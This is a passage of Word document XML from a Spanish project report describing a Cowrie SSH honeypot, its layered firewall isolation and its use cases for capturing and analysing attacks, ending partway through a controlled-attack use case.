        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Al terminar, se registra cowrie.session.closed con la duración de la sesión.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los logs acumulados se transfieren periódicamente al laboratorio local para su análisis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Seguridad y Aislamiento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Un aspecto crítico del diseño es la separación estricta entre el tráfico hostil (dirigido al honeypot) y el tráfico legítimo de administración. Esta separación se consigue mediante tres niveles de control:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nivel 1 — Infraestructura cloud (Cloud Firewall): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">el Cloud Firewall de Hetzner (honeypot-fw) permite exclusivamente el tráfico entrante TCP a los puertos 22 y 2022 e ICMP. Cualquier otro puerto se bloquea en la infraestructura del proveedor, antes de llegar al servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nivel 2 — Firewall del host (iptables): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">como segunda capa, la cadena INPUT de iptables rechaza todo el tráfico entrante salvo las conexiones ya establecidas, el SSH real (2022) y el puerto interno de Cowrie (2222). Las reglas se guardan con netfilter-persistent para sobrevivir a los reinicios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nivel 3 — Redirección NAT (iptables): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">la regla PREROUTING redirige todo el tráfico al puerto 22 hacia el puerto 2222 (Cowrie), asegurando que un atacante que conecta al puerto estándar de SSH interactúa exclusivamente con el honeypot. El SSH real en el puerto 2022 no se ve afectado por esta regla.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta defensa en profundidad garantiza que un fallo en cualquiera de los niveles individuales no compromete la seguridad del SSH de administración. Además, la autenticación del SSH real se restringe exclusivamente a claves ed25519, eliminando por completo la posibilidad de un acceso por fuerza bruta al servicio legítimo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Casos de Uso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85"/>
        <w:gridCol w:w="5954"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Caso de uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CU-01: Captura de ataque SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Atacante (bot), Honeypot (Cowrie)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Un atacante remoto intenta acceder al servidor SSH expuesto. Cowrie registra todos los eventos de la sesión.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cowrie está en ejecución y escuchando en el puerto 2222. iptables redirige :22 → :2222.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Postcondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Los eventos de la sesión quedan registrados en cowrie.json con todos los campos (IP, credenciales, comandos, descargas).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Datos de entrada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Conexión SSH con credenciales de fuerza bruta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Datos de salida</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Eventos JSON estructurados en cowrie.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="2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85"/>
        <w:gridCol w:w="5954"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Caso de uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CU-02: Análisis de logs con Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Administrador (Diego)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">El administrador ejecuta cowrie_analyzer.py sobre el fichero de logs para obtener métricas, gráficas y un informe de resumen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichero cowrie.json disponible en el laboratorio local. Python 3 con matplotlib instalado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Postcondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gráficas PNG generadas, informe de resumen en texto, datos listos para mapeo MITRE.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Datos de entrada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.json (logs del honeypot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Datos de salida</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gráficas PNG, informe .txt, ranking IPs con geolocalización</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="2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85"/>
        <w:gridCol w:w="5954"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Caso de uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CU-03: Ataque controlado desde Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Administrador (Diego), Kali Linux, Honeypot (Cowrie)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3750"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
